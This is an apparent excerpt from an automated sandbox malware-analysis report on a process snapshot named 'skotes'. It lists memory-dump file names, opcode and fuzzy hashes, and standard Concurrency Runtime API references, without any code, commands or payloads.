                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1091748018-0
                                                                                                                                                                                                                                          • Opcode ID: 4c9d1fa158f5bf654decda566f94a5ab8965e4fe6236f7ed8f5a5f96cfa71c01
                                                                                                                                                                                                                                          • Instruction ID: 34ba164814d21982b131f5399fa67f230e168b4a2c1d768781c24bfb519a60c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9d1fa158f5bf654decda566f94a5ab8965e4fe6236f7ed8f5a5f96cfa71c01
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D41EF74604210ABDF19EB25C886BBEBBF5EF45310F1480E9E5069B3C2CB70AD45CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00B956F2
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00B95726
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00B9578B
                                                                                                                                                                                                                                          • SafeRWList.LIBCONCRT ref: 00B9579A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 893951542-0
                                                                                                                                                                                                                                          • Opcode ID: 0ae81f296946daf9e8a0c06ad90694b0cba4a0f7951e6cb104d296a61fd14d79
                                                                                                                                                                                                                                          • Instruction ID: 7fe12cf9f04aa6fdb6c276a0cf86c261aa7ddb21ce470b0088bdceeaee2d94c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ae81f296946daf9e8a0c06ad90694b0cba4a0f7951e6cb104d296a61fd14d79
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC3166367416109FDF16AF64C881EAD73E6EF8A710F1842B9E9099F391DF30AD018B90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00B92D0F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3433162309-0
                                                                                                                                                                                                                                          • Opcode ID: c38688ee3900546352185ed13726681f16bc5faf03cb739eb1f75eec09d36d3e
                                                                                                                                                                                                                                          • Instruction ID: 2384adc35e9167451aec5f8f9a07f221e8913bbb4872c21fb0712b74754c9608
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c38688ee3900546352185ed13726681f16bc5faf03cb739eb1f75eec09d36d3e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5311475A00209EFCF14EF94C8C0AAEBBF9EF45310F1404BAD901AB246D730A945DBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00BA13FC
                                                                                                                                                                                                                                          • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00BA1447
                                                                                                                                                                                                                                          • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00BA147A
                                                                                                                                                                                                                                          • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00BA152A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2092016602-0
                                                                                                                                                                                                                                          • Opcode ID: 9405a388c8237a0f7057adbd38482d98d990a82ba34268f03725d669061a2d57
                                                                                                                                                                                                                                          • Instruction ID: 9f148a1707a2fd33985c2a081c01d15fa1d2ab3f1011d0f66aecd645f70e692d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9405a388c8237a0f7057adbd38482d98d990a82ba34268f03725d669061a2d57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31314D71A006069BCF54EFACC4919EDFBF5BF49710B1486ADE426AB391CB34A941CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
